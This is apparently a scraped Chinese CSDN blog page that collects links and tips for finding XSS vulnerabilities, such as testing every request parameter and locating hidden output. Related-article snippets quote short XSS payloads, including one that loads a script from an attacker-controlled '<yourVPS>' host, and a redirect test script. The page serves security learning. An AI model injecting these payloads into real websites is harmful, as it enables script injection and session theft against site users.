XSS知识汇总

最新推荐文章于 2022-07-27 13:00:33 发布
最新推荐文章于 2022-07-27 13:00:33 发布
阅读量797 收藏 1
点赞数 1
分类专栏: 安全 文章标签: XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/73456264
版权

『xss如何加载远程js的一些tips』
http://www.freebuf.com/articles/web/24496.html
『打造一个自动检测页面是否存在XSS的插件(完结篇)』
http://www.freebuf.com/sectool/82743.html
『说一说新手在寻找XSS时所存在的一些误区』
http://www.freebuf.com/articles/web/6389.html
误区1: XSS,不是专门去“绕过”限制。
XSS是很好防御的,不就是过滤一下么,所以我们不要太多寄希望与程序员错误的过滤逻辑,而应该把希望寄托于程序员的“忘记过滤”上。

1.像评论框,个人资料这种,你所能想到的位置。稍微有一点安全意识的程序员也能想到,所以经常是被过滤掉的。
2.你所填入的资料,并不总是以HTML标签的形式,输出到页面上。所以有时候并不是不能X,只是因为你填入的东西不对。

看不见有两个层面

A) 输入看不见。 建议大家在提交请求的时候,使用抓包软件,然后对请求的参数逐个测试。
B)  输出看不见。 建议大家对返回的数据,也可以使用抓包软件抓取数据,然后对抓回的数据进行搜索,搜索你输入的数据,来定位看不见的输出。还有一种方式,在chrome中,可以搜索浏览器调试工具中的[resource]

http://www.freebuf.com/articles/web/6389.html
『心伤的胖子的乌云主页』
https://web.archive.org/web/20160401042439/http://www.wooyun.org/whitehats/%E5%BF%83%E4%BC%A4%E7%9A%84%E8%83%96%E5%AD%90
这里写图片描述
『gainover的乌云主页』
https://web.archive.org/web/20160401042439/http://www.wooyun.org/whitehats/%E5%BF%83%E4%BC%A4%E7%9A%84%E8%83%96%E5%AD%90
这里写图片描述
『心伤的瘦子』
这里写图片描述
http://www.wooyun.org/whitehats/%E5%BF%83%E4%BC%A4%E7%9A%84%E7%98%A6%E5%AD%90
这里写图片描述

http://cb.drops.wiki/search.php?kind=bugs&keywords=那些年我们一起学XSS
这里写图片描述

caiqiiqi
关注
专栏目录
Web安全学习篇——XSS基础知识
Venscor技术养成之路
10-28 2114
之前一直都是做的Android客户端安全,也发现了一些安全问题。但后来,渐渐觉得Android App层安全,尤其是偏上层的安全,往往利用条件比较鸡肋,即使是危害比较大的漏洞。所以从今天起,基本放弃App层上层漏洞挖掘工作,后面像两个方向发展,一是Android App的逆向和加固技术,二是web安全。先从web安全开始!本篇记录XSS基础知识学习过程。一、XSS分类XSS漏洞分成三类,反射型XSS
【干货】XSS知识总结
hackzkaq的博客
10-27 6701
XSS基础 跨站脚本(英语:Cross-site scripting,通常简称为:XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至
关于XSS的一些知识
weixin_30575309的博客
03-25 119
安全套接层(SSL)无助于减少XSS攻击。当Web浏览器使用SSL的时候,在网络中传送的数据是经过加密的,但是因为XSS攻击是在客户机器上发生的,所以数据已经被解密了,这时,攻击者仍然能够利用XSS安全漏洞来访问解密后的数据。 XSS攻击中的一些常用数据域: URL/query字符串:攻击者能够在URL/query字符串中存储数据,并且通过控制用户访问指定的链接来使受害者发送这些数据给W...
xss知识点总结
weixin_45498459的博客
03-17 292
<script> alert(弹窗的值);</script> <script src="http://<yourVPS>/xss.js"></script>asd 在php中单引号中的变量是不被解析的,双引号中的变量和数组及常量是可以被解析的。 on事件大全 onactivate 当对象设置为活动元素时触发。 onafterprint 对象所关联的文档打印或打印预览后立即在对象上触发。 onbeforeactivate 对象要被设置..
XSS知识点总结
Jerry____的博客
07-08 469
浏览器遵守同源策略 javaScript同源对比:协议、域名、端口三者完全相同即是同源。 HTML中不受同源策略限制的标签: <script src = http://xss.tv/jquery.js> <img src = http://xss.tv/back.jpg> <iframe src = > <link src = > XSS 跨站脚本...
XSS知识点归纳
努力努力再努力
09-10 231
XSS知识点归纳 XSS攻击指通过HTML注入篡改网页,插入恶意的脚本,当用户浏览网页的时候,控制浏览器。 XSS的三种类型 反射型XSS 诱使用户点击一个恶意链接,才能攻击成功,即将用户输入的数据返回给浏览器 反射型XSS也叫做“非持久型XSS” 存储型XSS 将用户输入的数据存储到服务器端,这种XSS有很强的稳定性,所以也叫做持久型XSS。比如我在这篇博客里植入了恶意代码,访问到...
XSS注入知识点总结.pdf
02-07
以上内容涵盖了XSS攻击的基础知识、分类、构造方法、危害和防御策略,为网络安全专业人士和开发人员提供了一套全面的XSS攻击及防护指南。在实际工作中,应该根据具体情况,结合多种技术和措施来防御XSS攻击,保障Web...
xss基础知识
weixin_52776876的博客
07-27 2237
​跨站脚本攻击,英文全称CrossSiteScript.​xss攻击,通常指黑客通过"HTML注入"篡改了网页,插入了恶意的脚本.从而在用户浏览网页时,控制用户浏览器的一种攻击.
CSRF与XSS攻防知识点总结
小青蛙的博客
12-16 552
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Ma...
xss-vuln学习通关总结
最新发布
08-24
XSS漏洞详解】 XSS(Cross-site scripting)是一种常见的网络安全漏洞,主要表现为黑客通过注入恶意脚本到网页中,从而在用户浏览网页时控制用户的浏览器。这种攻击最初因为涉及跨域而得名,但随着JavaScript的...
心伤瘦子腾讯xss系列(21篇)
11-11
最全面的xss教程,全腾讯site实战,心伤瘦子大佬出品,21篇
那些年我们一起学XSS.pdf
08-07
相当经典的xss教程,也是我看到的最好的xss教程。 总共21个专题,由浅入深理解xss.
XSS学习总结21篇
qq_45300786的博客
06-18 666
所有的文章都是看源码分析的,但是我这里推荐用抓包工具看输出 这里我要补充一下xss的相关知识(这里非常非常重要,如果连这些都不知道,是很难做xss的) 一、html标签里可以继续写html标签 <p>giegie,我你男朋友不会揍我吧<script>alert(1)</script></p> 二、html元素的属性可以触发事件(https://www.runoob.com/html/html-attributes.html) HTML 属性 HTML 元素可
XSS笔记
公众号shadow sock7
07-25 350
设置php服务端脚本 $ cat index.php [3:06:29] &amp;amp;lt;?php session_start(); echo $_GET['x']. &amp;quot;\n&amp;quot;; echo '&amp;amp;lt;script&amp;amp;gt;location.href = &amp;quot;//127.0.0
听过来人来讲讲如何成为白帽
赵树祥的博客
10-27 2966
一、 1. 建议从Web安全入门,理解SQL注入和Xss这两个大类漏洞原理,SQL注入找靶场手注走一遍就能基本理解。Xss看这个系列教程 白帽子信息_心伤瘦子 。 2. 别急着去各种高端论坛和网站,踏踏实实来乌云,每天过一遍新公开漏洞,看思路,找个记事本记住关键点,看乌云知识库里的基础内容。 3. 选一个细分领域(比如邮箱Xss)集中研究一阵,然后在乌云上关注此类漏洞,看标
XSS高级实战教程
weixin_34194317的博客
06-03 291
1、【yueyan科普系列】XSS跨站脚本攻击--yueyan 2、存储型XSS的成因及挖掘方法--pkav 3、跨站脚本攻击实例解析--泉哥 4、XSS高级实战教程--心伤瘦子 5、XSS利用与挖掘-更新版--GAINOVER 6、XSS教学--gainover XSS教学 XSS实战教程 PKAV培训网站:http://edu.pkav.net/...
XSS挑战第一期Writeup
weixin_34278190的博客
02-18 2387
0x00 起因 这期 XSS 挑战的起因是在阅读“Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters”过后,在其中发现了一个很有趣的话题。那就是在圆括号被过滤的情况下,如何去执行javascript。在文中笔者给出来了这样的解决方 案: <a onmouseover="javascript...
DomXSS以及绕过浏览器检测机制方法总结
安全汪
06-27 8944
今天继续研究了一下PKAV“心伤瘦子”的XSS系列教程,收获挺大的,这里主要记录下来,以备忘记! 下面是这个系列教程的截图,可以在这里看到,当让,每一个知识知识点,都可以在这里(传送门)得到复现。作为程序员,会让你意思到自己以前的编码方式中有诸多的不足,作为安全研究者,深深地感觉到,原来还可以这么玩….昨天的知识点忘记整理了,先吧今天的写上,以后再补: **DOM_XSS之iframe标签的变
18. XSS过滤器绕过 [猥琐绕过]
→_→
05-22 592
作者:心伤瘦子 来自:PKAV技术宅社区 网址:http://www.pkav.net ---------------------------------------------------------------------------------------------------------- 简要描述: 有些时候,通用的绕过技巧并不可行,这个时候我们就得观察缺陷点的周围环境,想想其它办法咯。“猥琐绕过”与通用绕过不同的是,它通用性小,往往只是特例。 详细说明: 1. 直接看实例点:
XSS与SQL注入攻防详解
"XSS & SQL注入" ...总结,了解XSS和SQL注入的原理及防护策略是每个Web开发者和网络安全专业人员的基础知识。确保代码的安全性和应用最佳实践,可以有效防止这些常见攻击,保护用户数据的安全。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值